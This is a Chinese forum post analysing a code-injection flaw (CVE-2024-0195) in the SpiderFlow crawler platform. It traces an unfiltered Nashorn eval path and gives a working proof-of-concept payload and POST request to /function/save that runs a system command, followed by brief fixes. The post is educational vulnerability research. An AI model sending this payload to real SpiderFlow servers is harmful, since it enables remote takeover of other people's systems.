SpiderFlow爬虫平台漏洞利用分析(CVE-2024-0195)

万万哇  金牌会员 | 2024-4-9 19:42:30 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题
楼主

主题 833|帖子 833|积分 2499

1. 漏洞介绍

SpiderFlow爬虫平台项目中
spider-flow-web\src\main\java\org\spiderflow\controller\FunctionController.java文件的FunctionService.saveFunction函数调用了saveFunction函数,该调用了自定义函数validScript,该函数中用户能够控制 functionName、parameters 或 script 中的内容,从而构造恶意输入来执行任意的 JavaScript 代码,从而导致代码注入,并允许远程发起攻击,可导致服务器失陷。
2. 流程图分析

[img=720,292.93150684931504]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202401181501615.png[/img]
3. 搭建过程

1. IDEA Gitee 快速搭建

[img=720,368.59188544152744]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202401181501617.png[/img]
URL : https://gitee.com/jmxd/spider-flow.git
[img=720,580.280759702725]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202401181501618.png[/img]
2. 数据库搭建

我这里使用的是MySQL5.7,然后使用Navicat运行项目中spider-flow\db\spiderflow.sql这个SQL文件会在数据库中自动生成所需要的数据库:
[img=720,435.3488372093023]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202401181501619.png[/img]
[img=720,509.8901098901099]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202401181501620.png[/img]
[img=720,507.7038895859473]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202401181501621.png[/img]
[img=720,402.15343203230145]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202401181501622.png[/img]
3. 数据库连接

[img=720,607.6680497925311]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202401181501623.png[/img]
然后修改数据库配置文件application.properties,路径为:spider-flow\spider-flow-web\src\main\resources\application.properties
[img=720,360.18701298701296]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202401181501624.png[/img]
4. 运行

spider-flow\spider-flow-web\src\main\java\org\spiderflow\SpiderApplication.java
[img=720,432.62472885032537]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202401181501625.png[/img]
然后访问路径http://localhost:8088/,成功搭建!
[img=720,344.5045045045045]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202401181501626.png[/img]
4. 利用过程

首先我们直接在IDEA中寻找危险函数eval,使用Ctrl+shift+F文件搜索:
[img=720,395.3087701089777]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202401181501627.png[/img]
发现这里有个validScript函数调用了eval危险函数:
  1.    public static void validScript(String functionName,String parameters,String script) throws Exception {
  2.        new ScriptEngineManager().getEngineByName("nashorn").eval(concatScript(functionName,parameters,script));
  3.    }
复制代码
然后这里的我们去看看eval具体执行的参数是怎么生成的:
[img=720,446.6666666666667]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202401181501628.png[/img]
  1.    private static String concatScript(String functionName,String parameters,String script){
  2.        StringBuffer scriptBuffer = new StringBuffer();
  3.        scriptBuffer.append("function ")
  4.                .append(functionName)
  5.                .append("(")
  6.                .append(parameters == null ? "" : parameters)
  7.                .append("){")
  8.                .append(script)
  9.                .append("}");
  10.        return scriptBuffer.toString();
  11.    }
复制代码
可以看到concatScript 方法中,它接受三个参数 functionName、parameters 和 script,然后将它们拼接成一个 JavaScript 函数的字符串。这里它没有任何的过滤。所以我们可以尝试构造恶意的这三个参数实现RCE。
【----帮助网安学习,以下所有学习资料免费领!加vx:dctintin,备注 “博客园” 获取!】
 ① 网安学习成长路径思维导图
 ② 60+网安经典常用工具包
 ③ 100+SRC漏洞分析报告
 ④ 150+网安攻防实战技术电子书
 ⑤ 最权威CISSP 认证考试指南+题库
 ⑥ 超1800页CTF实战技巧手册
 ⑦ 最新网安大厂面试题合集(含答案)
 ⑧ APP客户端安全检测指南(安卓+IOS)
在上面的函数中将产生如下的字符串:
  1. function functionName(parameters){script}
复制代码
很明显我们可以构造恶意的script来导致RCE:
例如script的值可以为}Java.type('java.lang.Runtime').getRuntime().exec('calc');{
这样的话我们最终的字符串将会变成:
  1. function functionName(parameters){}Java.type('java.lang.Runtime').getRuntime().exec('calc');{}
复制代码
然后最后在执行的时候就会直接定义一个函数后执行我们的Java恶意代码。
然后我们分析是哪个函数调用了validScript函数
[img=720,430.37455105182147]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202401181501629.png[/img]
  1.    public String saveFunction(Function entity) {
  2.        try {
  3.            ScriptManager.validScript(entity.getName(),entity.getParameter(),entity.getScript());
  4.            super.saveOrUpdate(entity);
  5.            init();
  6.            return null;
  7.        } catch (Exception e) {
  8.            logger.error("保存自定义函数出错",e);
  9.            return ExceptionUtils.getStackTrace(e);
  10.        }
  11.    }
复制代码
然后在FunctionController.java调用了saveFunction
  1. @RestController
  2. @RequestMapping("/function")
  3. public class FunctionController {
  4.    ......
  5.     @RequestMapping("/save")
  6.    public String save(Function function){
  7.        return functionService.saveFunction(function);
  8.    }
  9.    ......
  10. }
复制代码
然后我们现在就可以去实际的功能点看需要哪些参数:
[img=720,339.3893129770992]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202401181501630.png[/img]
[img=720,386.13672496025436]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202401181501631.png[/img]
于是我们直接写出payload:
  1. POST /function/save HTTP/1.1
  2. Content-Length: 38
  3. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  4. Host: localhost:8088
  6. id=&name=rce&parameter=rce&script=}Java.type('java.lang.Runtime').getRuntime().exec('calc');{
复制代码
成功命令执行弹出计算器:
[img=720,400.15724815724815]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202401181501632.gif[/img]
修复方式


  • 过滤好script参数
  • 设置沙箱
5. 总结

这个项目在Gitee上面有7.4K的Star,有3.6K的fork记录,在实际部署上也不是很少,但是漏洞点出的不是很难主要是思路扩展,适宜入门。
更多网安技能的在线实操练习,请点击这里>>
  

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
回复

使用道具 举报

0 个回复

倒序浏览
返回列表

快速回复

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

万万哇

金牌会员
这个人很懒什么都没写!

楼主热帖

标签云

挺好的 服务器
微信订阅号
微信服务号
微信客服
小程序
H5
关于我们 商务合作 网站地图
©Copyright 2022-2024 杭州祥升科技有限公司 版权所有 浙ICP备20004199号
快速回复 返回顶部 返回列表